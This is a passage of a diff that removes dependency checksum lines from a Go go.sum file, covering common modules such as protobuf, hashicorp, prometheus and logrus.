-github.com/elazarl/goproxy v0.0.0-20170405201442-c4fc26588b6e/go.mod h1:/Zj4wYkgs4iZTTu3o/KG3Itv/qCCa8VVMlb3i9OVuzc=
-github.com/elazarl/goproxy v0.0.0-20180725130230-947c36da3153/go.mod h1:/Zj4wYkgs4iZTTu3o/KG3Itv/qCCa8VVMlb3i9OVuzc=
-github.com/emicklei/go-restful v0.0.0-20170410110728-ff4f55a20633/go.mod h1:otzb+WCGbkyDHkqmQmT5YD2WR4BBwUdeQoFo8l/7tVs=
-github.com/emicklei/go-restful v2.9.5+incompatible/go.mod h1:otzb+WCGbkyDHkqmQmT5YD2WR4BBwUdeQoFo8l/7tVs=
-github.com/evanphx/json-patch v4.2.0+incompatible/go.mod h1:50XU6AFN0ol/bzJsmQLiYLvXMP4fmwYFNcr97nuDLSk=
-github.com/felixge/httpsnoop v1.0.0 h1:gh8fMGz0rlOv/1WmRZm7OgncIOTsAj21iNJot48omJQ=
-github.com/felixge/httpsnoop v1.0.0/go.mod h1:3+D9sFq0ahK/JeJPhCBUV1xlf4/eIYrUQaxulT0VzX8=
-github.com/fsnotify/fsnotify v1.4.7/go.mod h1:jwhsz4b93w/PPRr/qN1Yymfu8t87LnFCMoQvtojpjFo=
-github.com/fsnotify/fsnotify v1.4.9 h1:hsms1Qyu0jgnwNXIxa+/V/PDsU6CfLf6CNO8H7IWoS4=
-github.com/fsnotify/fsnotify v1.4.9/go.mod h1:znqG4EE+3YCdAaPaxE2ZRY/06pZUdp0tY4IgpuI1SZQ=
-github.com/ghodss/yaml v0.0.0-20150909031657-73d445a93680/go.mod h1:4dBDuWmgqj2HViK6kFavaiC9ZROes6MMH2rRYeMEF04=
-github.com/ghodss/yaml v1.0.0 h1:wQHKEahhL6wmXdzwWG11gIVCkOv05bNOh+Rxn0yngAk=
-github.com/ghodss/yaml v1.0.0/go.mod h1:4dBDuWmgqj2HViK6kFavaiC9ZROes6MMH2rRYeMEF04=
-github.com/go-kit/kit v0.8.0/go.mod h1:xBxKIO96dXMWWy0MnWVtmwkA9/13aqxPnvrjFYMA2as=
-github.com/go-logfmt/logfmt v0.3.0/go.mod h1:Qt1PoO58o5twSAckw1HlFXLmHsOX5/0LbT9GBnD5lWE=
-github.com/go-logr/logr v0.1.0/go.mod h1:ixOQHD9gLJUVQQ2ZOR7zLEifBX6tGkNJF4QyIY7sIas=
-github.com/go-ole/go-ole v1.2.4 h1:nNBDSCOigTSiarFpYE9J/KtEA1IOW4CNeqT9TQDqCxI=
-github.com/go-ole/go-ole v1.2.4/go.mod h1:XCwSNxSkXRo4vlyPy93sltvi/qJq0jqQhjqQNIwKuxM=
-github.com/go-openapi/jsonpointer v0.0.0-20160704185906-46af16f9f7b1/go.mod h1:+35s3my2LFTysnkMfxsJBAMHj/DoqoB9knIWoYG/Vk0=
-github.com/go-openapi/jsonpointer v0.19.2/go.mod h1:3akKfEdA7DF1sugOqz1dVQHBcuDBPKZGEoHC/NkiQRg=
-github.com/go-openapi/jsonpointer v0.19.3/go.mod h1:Pl9vOtqEWErmShwVjC8pYs9cog34VGT37dQOVbmoatg=
-github.com/go-openapi/jsonreference v0.0.0-20160704190145-13c6e3589ad9/go.mod h1:W3Z9FmVs9qj+KR4zFKmDPGiLdk1D9Rlm7cyMvf57TTg=
-github.com/go-openapi/jsonreference v0.19.2/go.mod h1:jMjeRr2HHw6nAVajTXJ4eiUwohSTlpa0o73RUL1owJc=
-github.com/go-openapi/jsonreference v0.19.3/go.mod h1:rjx6GuL8TTa9VaixXglHmQmIL98+wF9xc8zWvFonSJ8=
-github.com/go-openapi/spec v0.0.0-20160808142527-6aced65f8501/go.mod h1:J8+jY1nAiCcj+friV/PDoE1/3eeccG9LYBs0tYvLOWc=
-github.com/go-openapi/spec v0.19.3/go.mod h1:FpwSN1ksY1eteniUU7X0N/BgJ7a4WvBFVA8Lj9mJglo=
-github.com/go-openapi/swag v0.0.0-20160704191624-1d0bd113de87/go.mod h1:DXUve3Dpr1UfpPtxFw+EFuQ41HhCWZfha5jSVRG7C7I=
-github.com/go-openapi/swag v0.19.2/go.mod h1:POnQmlKehdgb5mhVOsnJFsivZCEZ/vjK9gh66Z9tfKk=
-github.com/go-openapi/swag v0.19.5/go.mod h1:POnQmlKehdgb5mhVOsnJFsivZCEZ/vjK9gh66Z9tfKk=
-github.com/go-redis/redis/v8 v8.3.3 h1:e0CL9fsFDK92pkIJH2XAeS/NwO2VuIOAoJvI6yktZFk=
-github.com/go-redis/redis/v8 v8.3.3/go.mod h1:jszGxBCez8QA1HWSmQxJO9Y82kNibbUmeYhKWrBejTU=
-github.com/go-restit/lzjson v0.0.0-20161206095556-efe3c53acc68/go.mod h1:7vXSKQt83WmbPeyVjCfNT9YDJ5BUFmcwFsEjI9SCvYM=
-github.com/go-stack/stack v1.8.0/go.mod h1:v0f6uXyyMGvRgIKkXu+yp6POWl0qKG85gN/melR3HDY=
-github.com/gogo/protobuf v1.1.1/go.mod h1:r8qH/GZQm5c6nD/R0oafs1akxWv10x8SbQlK7atdtwQ=
-github.com/gogo/protobuf v1.2.2-0.20190723190241-65acae22fc9d/go.mod h1:SlYgWuQ5SjCEi6WLHjHCa1yvBfUnHcTbrrZtXPKa29o=
-github.com/gogo/protobuf v1.3.1/go.mod h1:SlYgWuQ5SjCEi6WLHjHCa1yvBfUnHcTbrrZtXPKa29o=
-github.com/gogo/protobuf v1.3.2 h1:Ov1cvc58UF3b5XjBnZv7+opcTcQFZebYjWzi34vdm4Q=
-github.com/gogo/protobuf v1.3.2/go.mod h1:P1XiOD3dCwIKUDQYPy72D8LYyHL2YPYrpS2s69NZV8Q=
-github.com/golang/glog v0.0.0-20160126235308-23def4e6c14b h1:VKtxabqXZkF25pY9ekfRL6a582T4P37/31XEstQ5p58=
-github.com/golang/glog v0.0.0-20160126235308-23def4e6c14b/go.mod h1:SBH7ygxi8pfUlaOkMMuAQtPIUF8ecWP5IEl/CR7VP2Q=
-github.com/golang/groupcache v0.0.0-20160516000752-02826c3e7903/go.mod h1:cIg4eruTrX1D+g88fzRXU5OdNfaM+9IcxsU14FzY7Hc=
-github.com/golang/groupcache v0.0.0-20190702054246-869f871628b6/go.mod h1:cIg4eruTrX1D+g88fzRXU5OdNfaM+9IcxsU14FzY7Hc=
-github.com/golang/mock v1.1.1/go.mod h1:oTYuIxOrZwtPieC+H1uAHpcLFnEyAGVDL/k47Jfbm0A=
-github.com/golang/mock v1.2.0/go.mod h1:oTYuIxOrZwtPieC+H1uAHpcLFnEyAGVDL/k47Jfbm0A=
-github.com/golang/protobuf v0.0.0-20161109072736-4bd1920723d7/go.mod h1:6lQm79b+lXiMfvg/cZm0SGofjICqVBUtrP5yJMmIC1U=
-github.com/golang/protobuf v1.2.0/go.mod h1:6lQm79b+lXiMfvg/cZm0SGofjICqVBUtrP5yJMmIC1U=
-github.com/golang/protobuf v1.3.1/go.mod h1:6lQm79b+lXiMfvg/cZm0SGofjICqVBUtrP5yJMmIC1U=
-github.com/golang/protobuf v1.3.2/go.mod h1:6lQm79b+lXiMfvg/cZm0SGofjICqVBUtrP5yJMmIC1U=
-github.com/golang/protobuf v1.4.0-rc.1/go.mod h1:ceaxUfeHdC40wWswd/P6IGgMaK3YpKi5j83Wpe3EHw8=
-github.com/golang/protobuf v1.4.0-rc.1.0.20200221234624-67d41d38c208/go.mod h1:xKAWHe0F5eneWXFV3EuXVDTCmh+JuBKY0li0aMyXATA=
-github.com/golang/protobuf v1.4.0-rc.2/go.mod h1:LlEzMj4AhA7rCAGe4KMBDvJI+AwstrUpVNzEA03Pprs=
-github.com/golang/protobuf v1.4.0-rc.4.0.20200313231945-b860323f09d0/go.mod h1:WU3c8KckQ9AFe+yFwt9sWVRKCVIyN9cPHBJSNnbL67w=
-github.com/golang/protobuf v1.4.0/go.mod h1:jodUvKwWbYaEsadDk5Fwe5c77LiNKVO9IDvqG2KuDX0=
-github.com/golang/protobuf v1.4.2 h1:+Z5KGCizgyZCbGh1KZqA0fcLLkwbsjIzS4aV2v7wJX0=
-github.com/golang/protobuf v1.4.2/go.mod h1:oDoupMAO8OvCJWAcko0GGGIgR6R6ocIYbsSw735rRwI=
-github.com/google/btree v0.0.0-20180813153112-4030bb1f1f0c/go.mod h1:lNA+9X1NB3Zf8V7Ke586lFgjr2dZNuvo3lPJSGZ5JPQ=
-github.com/google/btree v1.0.0 h1:0udJVsspx3VBr5FwtLhQQtuAsVc79tTq0ocGIPAU6qo=
-github.com/google/btree v1.0.0/go.mod h1:lNA+9X1NB3Zf8V7Ke586lFgjr2dZNuvo3lPJSGZ5JPQ=
-github.com/google/go-cmp v0.2.0/go.mod h1:oXzfMopK8JAjlY9xF4vHSVASa0yLyX7SntLO5aqRK0M=
-github.com/google/go-cmp v0.3.0/go.mod h1:8QqcDgzrUqlUb/G2PQTWiueGozuR1884gddMywk6iLU=
-github.com/google/go-cmp v0.3.1/go.mod h1:8QqcDgzrUqlUb/G2PQTWiueGozuR1884gddMywk6iLU=
-github.com/google/go-cmp v0.4.0/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE=
-github.com/google/go-cmp v0.5.2 h1:X2ev0eStA3AbceY54o37/0PQ/UWqKEiiO2dKL5OPaFM=
-github.com/google/go-cmp v0.5.2/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE=
-github.com/google/gofuzz v1.0.0/go.mod h1:dBl0BpW6vV/+mYPU4Po3pmUjxk6FQPldtuIdl/M65Eg=
-github.com/google/gofuzz v1.1.0 h1:Hsa8mG0dQ46ij8Sl2AYJDUv1oA9/d6Vk+3LG99Oe02g=
-github.com/google/gofuzz v1.1.0/go.mod h1:dBl0BpW6vV/+mYPU4Po3pmUjxk6FQPldtuIdl/M65Eg=
-github.com/google/martian v2.1.0+incompatible/go.mod h1:9I4somxYTbIHy5NJKHRl3wXiIaQGbYVAs8BPL6v8lEs=
-github.com/google/pprof v0.0.0-20181206194817-3ea8567a2e57/go.mod h1:zfwlbNMJ+OItoe0UupaVj+oy1omPYYDuagoSzA8v9mc=
-github.com/google/uuid v1.1.1/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo=
-github.com/googleapis/gax-go/v2 v2.0.4/go.mod h1:0Wqv26UfaUD9n4G6kQubkQ+KchISgw+vpHVxEJEs9eg=
-github.com/googleapis/gnostic v0.0.0-20170729233727-0c5108395e2d/go.mod h1:sJBsCZ4ayReDTBIg8b9dl28c5xFWyhBTVRp3pOg5EKY=
-github.com/googleapis/gnostic v0.1.0/go.mod h1:sJBsCZ4ayReDTBIg8b9dl28c5xFWyhBTVRp3pOg5EKY=
-github.com/gophercloud/gophercloud v0.1.0/go.mod h1:vxM41WHh5uqHVBMZHzuwNOHh8XEoIEcSTewFxm1c5g8=
-github.com/gopherjs/gopherjs v0.0.0-20181017120253-0766667cb4d1/go.mod h1:wJfORRmW1u3UXTncJ5qlYoELFm8eSnnEO6hX4iZ3EWY=
-github.com/gopherjs/gopherjs v0.0.0-20200217142428-fce0ec30dd00/go.mod h1:wJfORRmW1u3UXTncJ5qlYoELFm8eSnnEO6hX4iZ3EWY=
-github.com/gregjones/httpcache v0.0.0-20180305231024-9cad4c3443a7/go.mod h1:FecbI9+v66THATjSRHfNgh1IVFe/9kFxbXtjV0ctIMA=
-github.com/hashicorp/errwrap v1.0.0 h1:hLrqtEDnRye3+sgx6z4qVLNuviH3MR5aQ0ykNJa/UYA=
-github.com/hashicorp/errwrap v1.0.0/go.mod h1:YH+1FKiLXxHSkmPseP+kNlulaMuP3n2brvKWEqk/Jc4=
-github.com/hashicorp/go-immutable-radix v1.0.0 h1:AKDB1HM5PWEA7i4nhcpwOrO2byshxBjXVn/J/3+z5/0=
-github.com/hashicorp/go-immutable-radix v1.0.0/go.mod h1:0y9vanUI8NX6FsYoO3zeMjhV/C5i9g4Q3DwcSNZ4P60=
-github.com/hashicorp/go-msgpack v0.5.3 h1:zKjpN5BK/P5lMYrLmBHdBULWbJ0XpYR+7NGzqkZzoD4=
-github.com/hashicorp/go-msgpack v0.5.3/go.mod h1:ahLV/dePpqEmjfWmKiqvPkv/twdG7iPBM1vqhUKIvfM=
-github.com/hashicorp/go-multierror v1.0.0 h1:iVjPR7a6H0tWELX5NxNe7bYopibicUzc7uPribsnS6o=
-github.com/hashicorp/go-multierror v1.0.0/go.mod h1:dHtQlpGsu+cZNNAkkCN/P3hoUDHhCYQXV3UM06sGGrk=
-github.com/hashicorp/go-sockaddr v1.0.0 h1:GeH6tui99pF4NJgfnhp+L6+FfobzVW3Ah46sLo0ICXs=
-github.com/hashicorp/go-sockaddr v1.0.0/go.mod h1:7Xibr9yA9JjQq1JpNB2Vw7kxv8xerXegt+ozgdvDeDU=
-github.com/hashicorp/go-uuid v1.0.0 h1:RS8zrF7PhGwyNPOtxSClXXj9HA8feRnJzgnI1RJCSnM=
-github.com/hashicorp/go-uuid v1.0.0/go.mod h1:6SBZvOh/SIDV7/2o3Jml5SYk/TvGqwFJ/bN7x4byOro=
-github.com/hashicorp/golang-lru v0.5.0/go.mod h1:/m3WP610KZHVQ1SGc6re/UDhFvYD7pJ4Ao+sR/qLZy8=
-github.com/hashicorp/golang-lru v0.5.1 h1:0hERBMJE1eitiLkihrMvRVBYAkpHzc/J3QdDN+dAcgU=
-github.com/hashicorp/golang-lru v0.5.1/go.mod h1:/m3WP610KZHVQ1SGc6re/UDhFvYD7pJ4Ao+sR/qLZy8=
-github.com/hashicorp/memberlist v0.1.4 h1:gkyML/r71w3FL8gUi74Vk76avkj/9lYAY9lvg0OcoGs=
-github.com/hashicorp/memberlist v0.1.4/go.mod h1:ajVTdAv/9Im8oMAAj5G31PhhMCZJV2pPBoIllUwCN7I=
-github.com/hpcloud/tail v1.0.0/go.mod h1:ab1qPbhIpdTxEkNHXyeSf5vhxWSCs/tWer42PpOxQnU=
-github.com/imdario/mergo v0.3.5/go.mod h1:2EnlNZ0deacrJVfApfmtdGgDfMuh/nq6Ok1EcJh5FfA=
-github.com/instana/go-sensor v1.4.16 h1:0tMdsO4WdduVhT0nJjriBp+tv+36d8Q1/8m6vUy9gS8=
-github.com/instana/go-sensor v1.4.16/go.mod h1:P1ynE0u78bUBZ2GkWewRpAO1/w1oW9CKDozeueH6QSg=
-github.com/json-iterator/go v1.1.6/go.mod h1:+SdeFBvtyEkXs7REEP0seUULqWtbJapLOCVDaaPEHmU=
-github.com/json-iterator/go v1.1.8 h1:QiWkFLKq0T7mpzwOTu6BzNDbfTE8OLrYhVKYMLF46Ok=
-github.com/json-iterator/go v1.1.8/go.mod h1:KdQUCv79m/52Kvf8AW2vK1V8akMuk1QjK/uOdHXbAo4=
-github.com/jstemmer/go-junit-report v0.0.0-20190106144839-af01ea7f8024/go.mod h1:6v2b51hI/fHJwM22ozAgKL4VKDeJcHhJFhtBdhmNjmU=
-github.com/jtolds/gls v4.20.0+incompatible/go.mod h1:QJZ7F/aHp+rZTRtaJ1ow/lLfFfVYBRgL+9YlvaHOwJU=
-github.com/julienschmidt/httprouter v1.2.0/go.mod h1:SYymIcj16QtmaHHD7aYtjjsJG7VTCxuUUipMqKk8s4w=
-github.com/kisielk/errcheck v1.2.0/go.mod h1:/BMXB+zMLi60iA8Vv6Ksmxu/1UDYcXs4uQLJ+jE2L00=
-github.com/kisielk/errcheck v1.5.0/go.mod h1:pFxgyoBC7bSaBwPgfKdkLd5X25qrDl4LWUI2bnpBCr8=
-github.com/kisielk/gotool v1.0.0/go.mod h1:XhKaO+MFFWcvkIS/tQcRk01m1F5IRFswLeQ+oQHNcck=
-github.com/konsorten/go-windows-terminal-sequences v1.0.1 h1:mweAR1A6xJ3oS2pRaGiHgQ4OO8tzTaLawm8vnODuwDk=
-github.com/konsorten/go-windows-terminal-sequences v1.0.1/go.mod h1:T0+1ngSBFLxvqU3pZ+m/2kptfBszLMUkC4ZK/EgS/cQ=
-github.com/kr/logfmt v0.0.0-20140226030751-b84e30acd515/go.mod h1:+0opPa2QZZtGFBFZlji/RkVcI2GknAs/DXo4wKdlNEc=
-github.com/kr/pretty v0.1.0 h1:L/CwN0zerZDmRFUapSPitk6f+Q3+0za1rQkzVuMiMFI=
-github.com/kr/pretty v0.1.0/go.mod h1:dAy3ld7l9f0ibDNOQOHHMYYIIbhfbHSm3C4ZsoJORNo=
-github.com/kr/pty v1.1.1/go.mod h1:pFQYn66WHrOpPYNljwOMqo10TkYh1fy3cYio2l3bCsQ=
-github.com/kr/pty v1.1.5/go.mod h1:9r2w37qlBe7rQ6e1fg1S/9xpWHSnaqNdHD3WcMdbPDA=
-github.com/kr/text v0.1.0 h1:45sCR5RtlFHMR4UwH9sdQ5TC8v0qDQCHnXt+kaKSTVE=
-github.com/kr/text v0.1.0/go.mod h1:4Jbv+DJW3UT/LiOwJeYQe1efqtUx/iVham/4vfdArNI=
-github.com/lightstep/lightstep-tracer-common/golang/gogo v0.0.0-20210210170715-a8dfcb80d3a7 h1:YjW+hUb8Fh2S58z4av4t/0cBMK/Q0aP48RocCFsC8yI=
-github.com/lightstep/lightstep-tracer-common/golang/gogo v0.0.0-20210210170715-a8dfcb80d3a7/go.mod h1:Spd59icnvRxSKuyijbbwe5AemzvcyXAUBgApa7VybMw=
-github.com/lightstep/lightstep-tracer-go v0.24.1-0.20210318180546-a67254760a58 h1:qPPXc3iS7MH/+rrKjoWJvAxl0ju66uPTYiTupe7OIUM=
-github.com/lightstep/lightstep-tracer-go v0.24.1-0.20210318180546-a67254760a58/go.mod h1:dUti2qkbGISTJF6xN0Jj6/WxxNFYDmHJBPGkOaCYAi8=
-github.com/looplab/fsm v0.1.0 h1:Qte7Zdn/5hBNbXzP7yxVU4OIFHWXBovyTT2LaBTyC20=
-github.com/looplab/fsm v0.1.0/go.mod h1:m2VaOfDHxqXBBMgc26m6yUOwkFn8H2AlJDE+jd/uafI=
-github.com/mailru/easyjson v0.0.0-20160728113105-d5b7844b561a/go.mod h1:C1wdFJiN94OJF2b5HbByQZoLdCWB1Yqtg26g4irojpc=
-github.com/mailru/easyjson v0.0.0-20190614124828-94de47d64c63/go.mod h1:C1wdFJiN94OJF2b5HbByQZoLdCWB1Yqtg26g4irojpc=
-github.com/mailru/easyjson v0.0.0-20190626092158-b2ccc519800e/go.mod h1:C1wdFJiN94OJF2b5HbByQZoLdCWB1Yqtg26g4irojpc=
-github.com/mailru/easyjson v0.7.0/go.mod h1:KAzv3t3aY1NaHWoQz1+4F1ccyAH66Jk7yos7ldAVICs=
-github.com/matttproud/golang_protobuf_extensions v1.0.1 h1:4hp9jkHxhMHkqkrB3Ix0jegS5sx/RkqARlsWZ6pIwiU=
-github.com/matttproud/golang_protobuf_extensions v1.0.1/go.mod h1:D8He9yQNgCq6Z5Ld7szi9bcBfOoFv/3dc6xSMkL2PC0=
-github.com/miekg/dns v1.0.14/go.mod h1:W1PPwlIAgtquWBMBEV9nkV9Cazfe8ScdGz/Lj7v3Nrg=
-github.com/miekg/dns v1.1.41 h1:WMszZWJG0XmzbK9FEmzH2TVcqYzFesusSIB41b8KHxY=
-github.com/miekg/dns v1.1.41/go.mod h1:p6aan82bvRIyn+zDIv9xYNUpwa73JcSh9BKwknJysuI=
-github.com/modern-go/concurrent v0.0.0-20180228061459-e0a39a4cb421/go.mod h1:6dJC0mAP4ikYIbvyc7fijjWJddQyLn8Ig3JB5CqoB9Q=
-github.com/modern-go/concurrent v0.0.0-20180306012644-bacd9c7ef1dd h1:TRLaZ9cD/w8PVh93nsPXa1VrQ6jlwL5oN8l14QlcNfg=
-github.com/modern-go/concurrent v0.0.0-20180306012644-bacd9c7ef1dd/go.mod h1:6dJC0mAP4ikYIbvyc7fijjWJddQyLn8Ig3JB5CqoB9Q=
-github.com/modern-go/reflect2 v0.0.0-20180701023420-4b7aa43c6742/go.mod h1:bx2lNnkwVCuqBIxFjflWJWanXIb3RllmbCylyMrvgv0=
-github.com/modern-go/reflect2 v1.0.1 h1:9f412s+6RmYXLWZSEzVVgPGK7C2PphHj5RJrvfx9AWI=
-github.com/modern-go/reflect2 v1.0.1/go.mod h1:bx2lNnkwVCuqBIxFjflWJWanXIb3RllmbCylyMrvgv0=
-github.com/munnerz/goautoneg v0.0.0-20120707110453-a547fc61f48d/go.mod h1:+n7T8mK8HuQTcFwEeznm/DIxMOiR9yIdICNftLE1DvQ=
-github.com/mwitkow/go-conntrack v0.0.0-20161129095857-cc309e4a2223/go.mod h1:qRWi+5nqEBWmkhHvq77mSJWrCKwh8bxhgT7d/eI7P4U=
-github.com/mxk/go-flowrate v0.0.0-20140419014527-cca7078d478f/go.mod h1:ZdcZmHo+o7JKHSa8/e818NopupXU1YMK5fe1lsApnBw=
-github.com/nxadm/tail v1.4.4 h1:DQuhQpB1tVlglWS2hLQ5OV6B5r8aGxSrPc5Qo6uTN78=
-github.com/nxadm/tail v1.4.4/go.mod h1:kenIhsEOeOJmVchQTgglprH7qJGnHDVpk1VPCcaMI8A=
-github.com/oklog/ulid v1.3.1 h1:EGfNDEx6MqHz8B3uNV6QAib1UR2Lm97sHi3ocA6ESJ4=
-github.com/oklog/ulid v1.3.1/go.mod h1:CirwcVhetQ6Lv90oh/F+FBtV6XMibvdAFo93nm5qn4U=
-github.com/onsi/ginkgo v0.0.0-20170829012221-11459a886d9c/go.mod h1:lLunBs/Ym6LB5Z9jYTR76FiuTmxDTDusOGeTQH+WWjE=
-github.com/onsi/ginkgo v1.6.0/go.mod h1:lLunBs/Ym6LB5Z9jYTR76FiuTmxDTDusOGeTQH+WWjE=
-github.com/onsi/ginkgo v1.7.0/go.mod h1:lLunBs/Ym6LB5Z9jYTR76FiuTmxDTDusOGeTQH+WWjE=
-github.com/onsi/ginkgo v1.10.1/go.mod h1:lLunBs/Ym6LB5Z9jYTR76FiuTmxDTDusOGeTQH+WWjE=
-github.com/onsi/ginkgo v1.11.0/go.mod h1:lLunBs/Ym6LB5Z9jYTR76FiuTmxDTDusOGeTQH+WWjE=
-github.com/onsi/ginkgo v1.12.1/go.mod h1:zj2OWP4+oCPe1qIXoGWkgMRwljMUYCdkwsT2108oapk=
-github.com/onsi/ginkgo v1.14.2 h1:8mVmC9kjFFmA8H4pKMUhcblgifdkOIXPvbhN1T36q1M=
-github.com/onsi/ginkgo v1.14.2/go.mod h1:iSB4RoI2tjJc9BBv4NKIKWKya62Rps+oPG/Lv9klQyY=
-github.com/onsi/gomega v0.0.0-20170829124025-dcabb60a477c/go.mod h1:C1qb7wdrVGGVU+Z6iS04AVkA3Q65CEZX59MT0QO5uiA=
-github.com/onsi/gomega v1.4.3/go.mod h1:ex+gbHU/CVuBBDIJjb2X0qEXbFg53c61hWP/1CpauHY=
-github.com/onsi/gomega v1.7.0/go.mod h1:ex+gbHU/CVuBBDIJjb2X0qEXbFg53c61hWP/1CpauHY=
-github.com/onsi/gomega v1.7.1/go.mod h1:XdKZgCCFLUoM/7CFJVPcG8C1xQ1AJ0vpAezJrB7JYyY=
-github.com/onsi/gomega v1.10.1/go.mod h1:iN09h71vgCQne3DLsj+A5owkum+a2tYe+TOCB1ybHNo=
-github.com/onsi/gomega v1.10.3 h1:gph6h/qe9GSUw1NhH1gp+qb+h8rXD8Cy60Z32Qw3ELA=
-github.com/onsi/gomega v1.10.3/go.mod h1:V9xEwhxec5O8UDM77eCW8vLymOMltsqPVYWrpDsH8xc=
-github.com/opentracing/basictracer-go v1.0.0 h1:YyUAhaEfjoWXclZVJ9sGoNct7j4TVk7lZWlQw5UXuoo=
-github.com/opentracing/basictracer-go v1.0.0/go.mod h1:QfBfYuafItcjQuMwinw9GhYKwFXS9KnPs5lxoYwgW74=
-github.com/opentracing/opentracing-go v1.0.2/go.mod h1:UkNAQd3GIcIGf0SeVgPpRdFStlNbqXla1AfSYxPUl2o=
-github.com/opentracing/opentracing-go v1.1.0 h1:pWlfV3Bxv7k65HYwkikxat0+s3pV4bsqf19k25Ur8rU=
-github.com/opentracing/opentracing-go v1.1.0/go.mod h1:UkNAQd3GIcIGf0SeVgPpRdFStlNbqXla1AfSYxPUl2o=
-github.com/pascaldekloe/goe v0.0.0-20180627143212-57f6aae5913c h1:Lgl0gzECD8GnQ5QCWA8o6BtfL6mDH5rQgM4/fX3avOs=
-github.com/pascaldekloe/goe v0.0.0-20180627143212-57f6aae5913c/go.mod h1:lzWF7FIEvWOWxwDKqyGYQf6ZUaNfKdP144TG7ZOy1lc=
-github.com/peterbourgon/diskv v2.0.1+incompatible/go.mod h1:uqqh8zWWbv1HBMNONnaR/tNboyR3/BZd58JJSHlUSCU=
-github.com/pkg/errors v0.8.0/go.mod h1:bwawxfHBFNV+L2hUp1rHADufV3IMtnDRdf1r5NINEl0=
-github.com/pkg/errors v0.8.1 h1:iURUrRGxPUNPdy5/HRSm+Yj6okJ6UtLINN0Q9M4+h3I=
-github.com/pkg/errors v0.8.1/go.mod h1:bwawxfHBFNV+L2hUp1rHADufV3IMtnDRdf1r5NINEl0=
-github.com/pmezard/go-difflib v1.0.0 h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM=
-github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4=
-github.com/pquerna/cachecontrol v0.0.0-20180517163645-1555304b9b35 h1:J9b7z+QKAmPf4YLrFg6oQUotqHQeUNWwkvo7jZp1GLU=
-github.com/pquerna/cachecontrol v0.0.0-20180517163645-1555304b9b35/go.mod h1:prYjPmNq4d1NPVmpShWobRqXY3q7Vp+80DqgxxUrUIA=
-github.com/prometheus/client_golang v0.9.1/go.mod h1:7SWBe2y4D6OKWSNQJUaRYU/AaXPKyh/dDVn+NZz0KFw=
-github.com/prometheus/client_golang v1.0.0 h1:vrDKnkGzuGvhNAL56c7DBz29ZL+KxnoR0x7enabFceM=
-github.com/prometheus/client_golang v1.0.0/go.mod h1:db9x61etRT2tGnBNRi70OPL5FsnadC4Ky3P0J6CfImo=
-github.com/prometheus/client_model v0.0.0-20180712105110-5c3871d89910/go.mod h1:MbSGuTsp3dbXC40dX6PRTWyKYBIrTGTE9sqQNg2J8bo=
-github.com/prometheus/client_model v0.0.0-20190129233127-fd36f4220a90 h1:S/YWwWx/RA8rT8tKFRuGUZhuA90OyIBpPCXkcbwU8DE=
-github.com/prometheus/client_model v0.0.0-20190129233127-fd36f4220a90/go.mod h1:xMI15A0UPsDsEKsMN9yxemIoYk6Tm2C1GtYGdfGttqA=
-github.com/prometheus/common v0.4.1 h1:K0MGApIoQvMw27RTdJkPbr3JZ7DNbtxQNyi5STVM6Kw=
-github.com/prometheus/common v0.4.1/go.mod h1:TNfzLD0ON7rHzMJeJkieUDPYmFC7Snx/y86RQel1bk4=
-github.com/prometheus/procfs v0.0.0-20181005140218-185b4288413d/go.mod h1:c3At6R/oaqEKCNdg8wHV1ftS6bRYblBhIjjI8uT2IGk=
-github.com/prometheus/procfs v0.0.2 h1:6LJUbpNm42llc4HRCuvApCSWB/WfhuNo9K98Q9sNGfs=
-github.com/prometheus/procfs v0.0.2/go.mod h1:TjEm7ze935MbeOT/UhFTIMYKhuLP4wbCsTZCD3I8kEA=
-github.com/rcrowley/go-metrics v0.0.0-20181016184325-3113b8401b8a h1:9ZKAASQSHhDYGoxY8uLVpewe1GDZ2vu2Tr/vTdVAkFQ=
-github.com/rcrowley/go-metrics v0.0.0-20181016184325-3113b8401b8a/go.mod h1:bCqnVzQkZxMG4s8nGwiZ5l3QUCyqpo9Y+/ZMZ9VjZe4=
-github.com/remyoudompheng/bigfft v0.0.0-20170806203942-52369c62f446/go.mod h1:uYEyJGbgTkfkS4+E/PavXkNJcbFIpEtjt2B0KDQ5+9M=
-github.com/sanity-io/litter v1.1.0 h1:BllcKWa3VbZmOZbDCoszYLk7zCsKHz5Beossi8SUcTc=
-github.com/sanity-io/litter v1.1.0/go.mod h1:CJ0VCw2q4qKU7LaQr3n7UOSHzgEMgcGco7N/SkZQPjw=
-github.com/sarslanhan/cronmask v0.0.0-20190709075623-766eca24d011 h1:S5j3KTsiGwmQSEJJBp0iIG87CDBCGCwbYLmVv8L/nuE=
-github.com/sarslanhan/cronmask v0.0.0-20190709075623-766eca24d011/go.mod h1:NmI1tg7wwsf1hF6G5EtyGCrtNKsH2RIdYYoJa7GsnP8=
-github.com/sean-/seed v0.0.0-20170313163322-e2103e2c3529 h1:nn5Wsu0esKSJiIVhscUtVbo7ada43DJhG55ua/hjS5I=
-github.com/sean-/seed v0.0.0-20170313163322-e2103e2c3529/go.mod h1:DxrIzT+xaE7yg65j358z/aeFdxmN0P9QXhEzd20vsDc=
-github.com/shirou/gopsutil v2.20.1+incompatible/go.mod h1:5b4v6he4MtMOwMlS0TUMTu2PcXUg8+E1lC7eC3UO/RA=
-github.com/shirou/gopsutil v3.21.2+incompatible h1:U+YvJfjCh6MslYlIAXvPtzhW3YZEtc9uncueUNpD/0A=
-github.com/shirou/gopsutil v3.21.2+incompatible/go.mod h1:5b4v6he4MtMOwMlS0TUMTu2PcXUg8+E1lC7eC3UO/RA=
-github.com/sirupsen/logrus v1.2.0/go.mod h1:LxeOpSwHxABJmUn/MG1IvRgCAasNZTLOkJPxbbu5VWo=
-github.com/sirupsen/logrus v1.4.2 h1:SPIRibHv4MatM3XXNO2BJeFLZwZ2LvZgfQ5+UNI2im4=
-github.com/sirupsen/logrus v1.4.2/go.mod h1:tLMulIdttU9McNUspp0xgXVQah82FyeX6MwdIuYE2rE=
-github.com/smartystreets/assertions v0.0.0-20180927180507-b2de0cb4f26d/go.mod h1:OnSkiWE9lh6wB0YB77sQom3nweQdgAjqCqsofrRNTgc=
